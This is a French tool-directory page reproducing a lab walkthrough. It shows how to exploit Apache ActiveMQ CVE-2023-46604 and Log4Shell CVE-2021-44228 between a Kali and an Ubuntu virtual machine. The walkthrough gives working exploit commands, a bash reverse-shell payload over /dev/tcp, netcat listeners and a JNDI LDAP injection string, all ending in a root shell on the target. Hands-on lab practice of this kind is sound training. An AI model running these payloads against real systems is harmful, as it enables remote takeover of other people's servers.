Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-Lab — Instructions pour exploiter les vulnérabilités CVE-2021-44228 et CVE-2023-46604 | Kitploit
Outils/GitHubGitHub/dcm2406/cve-lab
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationLabs et Pratique
GitHubdcm2406/cve-lab

CVE-Lab

Instructions pour exploiter les vulnérabilités CVE-2021-44228 et CVE-2023-46604

Voir le dépôt
2il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Laboratoire CVE-2023-46604

Ce laboratoire guide sur l'exploitation des vulnérabilités de CVE-2023-46604

Remerciements

  • Apache ActiveMQ
  • CVE-2023-46604

Environnement

Ce laboratoire nécessite l'installation de 2 machines virtuelles. Une machine Kali Linux version 2023.4 et une machine Ubuntu version 22.04.3 LTS. Vous pouvez les télécharger ici :

  • Kali Linux 2023.4
  • Ubuntu 22.04.3 LTS
  • VMware-workstation-17.5.0 pour Windows
  • VMware-workstation-17.5.0 pour Linux

Modèle et configuration système requise

Sur la machine Kali Linux :

Installer git

root@kitploit:~
$sudo apt install git

Installer gedit

root@kitploit:~
$sudo apt install gedit

Sur la machine Ubuntu :

Installer git

root@kitploit:~
$sudo apt install git

Installer openjdk 18

root@kitploit:~
$sudo apt install openjdk-18-jdk

Installer le paquet ActiveMQ 5.18.2

root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/ApacheActiveMQ
$cd ApacheActiveMQ/
$tar -xf apache-activemq-5.18.2-bin.tar.gz

Construction du serveur (lancer le service activemq)

Sur la machine Ubuntu Ouvrez une fenêtre de terminal et exécutez la commande comme ci-dessous :

root@kitploit:~
$sudo su
$cd ApacheActiveMQ/apache-activemq-5.18.2/bin/linux-x86-64
$./activemq start

Vérifiez l'état du service :

root@kitploit:~
$./activemq status

Si le service démarre avec succès, il s'affichera sur l'écran du terminal comme "ActiveMQ Brocker is running".

Vous pouvez également visiter http://127.0.0.1:8161 pour ouvrir le gestionnaire de broker ActiveMQ. Il inclut le nom d'hôte, la version, l'ID, le temps de disponibilité et d'autres informations.

Exploitation

Sur la machine Kali Linux

Téléchargez les ressources pour le processus d'exploitation :

root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/CVE-2023-46604
$cd CVE-2023-46604
$ls

Comme vous pouvez le voir, nous avons 2 fichiers exploit.py et poc.xml :

  • Le fichier poc.xml contient un morceau de code malveillant qui exploite une vulnérabilité dans le protocole OpenWire.
  • Le fichier exploit.py est responsable du chiffrement HTTP et de l'envoi du fichier poc.xml au Brocker sur la machine cible. Ouvrez un serveur web dans le chemin des ressources :
root@kitploit:~
$cd CVE-2023-46604
$python3 -m http.server

Ouvrez une nouvelle fenêtre de terminal pour envoyer le fichier poc.xml au serveur cible via le fichier exploit.py :

root@kitploit:~
$sudo su
$cd CVE-2023-46604
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml

Après l'exécution de la commande, l'application Calculatrice est lancée sur la machine cible. Cela prouve que la vulnérabilité a été exploitée avec succès. Nous continuons à créer un reverse shell pour contrôler la machine cible.

Ouvrez une nouvelle fenêtre de terminal pour écouter les connexions reverse shell :

root@kitploit:~
$sudo su
$nc -nlvp 4444

Revenez au terminal précédent et modifiez le fichier poc.xml :

root@kitploit:~
$gedit poc.xml

Remplacez la valeur gnome-calculator par bash -i >& /dev/tcp/192.168.132.130/4444 0>&1 et enregistrez le fichier.

Envoi du code malveillant à nouveau :

root@kitploit:~
$python3 exploit.py -i 192.168.132.135 -p 61616 --xml http://192.168.132.130:8000/poc.xml

Le résultat de cette commande est que nous avons obtenu le shell root sur la machine cible. ROOTED!!!

Laboratoire CVE-2021-44228

Remerciements

  • Apache log4j
  • CVE-2023-44228 - log4shell

Environnement

Ce laboratoire nécessite l'installation de 2 machines virtuelles. Une machine Kali Linux version 2023.4 et une machine Ubuntu version 22.04.3 LTS. Vous pouvez les télécharger ici :

  • Kali Linux 2023.4
  • Ubuntu 22.04.3 LTS
  • VMware-workstation-17.5.0 pour Windows
  • VMware-workstation-17.5.0 pour Linux

Modèle et configuration système requise

Sur la machine Kali Linux :

Installer git

root@kitploit:~
$sudo apt install git

Installer gedit

root@kitploit:~
$sudo apt install gedit

Sur la machine Ubuntu :

Installer git

root@kitploit:~
$sudo apt install git

Installer docker

root@kitploit:~
$sudo apt install docker.io 

Construction du serveur web

Sur la machine Ubuntu

Étape 1 : Téléchargez openjdk

root@kitploit:~
$sudo su
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz
$tar -xf jdk-8u20-linux-x64.tar.gz

Étape 2 : Téléchargez et construisez le fichier Docker

root@kitploit:~
$sudo su
$git clone https://github.com/dcm2406/web-server-cve44228
root@kitploit:~
$docker build -t cve44228
$docker run --network host cve44228

Après avoir exécuté les commandes ci-dessus, nous avons un site web. Pour naviguer sur le web, vous pouvez utiliser l'URL : http://<ubuntu_ip>:8080. Dans ce tutoriel, l'adresse ressemblera à : http://192.168.132.135:8080

Exploitation

Sur la machine Kali Linux, téléchargez les ressources nécessaires pour exploiter la vulnérabilité

Téléchargez le POC

root@kitploit:~
$sudo su
$git clone https://github.com/kozmer/log4j-shell-poc
$pip install -r requirement.txt

Téléchargez openjdk

root@kitploit:~
$sudo su
$wget https://www.cs.ait.ac.th/~marikhu/installers/jdk-8u20-linux-x64.tar.gz

//déplacez le fichier openjdk vers le répertoire contenant le fichier POC
$mv jdk-8u20-linux-x64.tar.gz <chemin vers le répertoire contenant le fichier POC>

$tar -xf jdk-8u20-linux-x64.tar.gz   //décompressez le fichier

Ouvrez un nouveau terminal pour écouter les connexions reverse shell :

root@kitploit:~
$sudo su
$nc -nlvp 9001

Lancez les services LDAP et HTTP avec le fichier POC

root@kitploit:~
$sudo su
$cd log4j-shell-poc
$python3 poc.py --userip 192.168.132.130 --lport 9001 --webport 8080

La commande renverra des résultats similaires à ceux-ci

root@kitploit:~
[!] CVE: CVE-2021-44228
Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up LDAP server

[+] Send me: ${jndi:ldap://192.168.132.130:1389/a}

[+] Starting Webserver on port 8080 http://0.0.0.0:8080
Listening on 0.0.0.0:1389

Ici, nous ne nous intéressons qu'à la valeur jndi générée. Ouvrez un navigateur Web et saisissez l'adresse du site Web que vous avez créé précédemment. Connectez-vous en utilisant la valeur jndi. À ce moment, le terminal netcat reçoit une connexion. ROOTED!!!

Documentation

Rapport de recherche CVE

Support

Pour obtenir du support, envoyez un e-mail à [email protected]

Auteurs

  • @dcm2406
  • @tCu0n9
Télécharger l’outil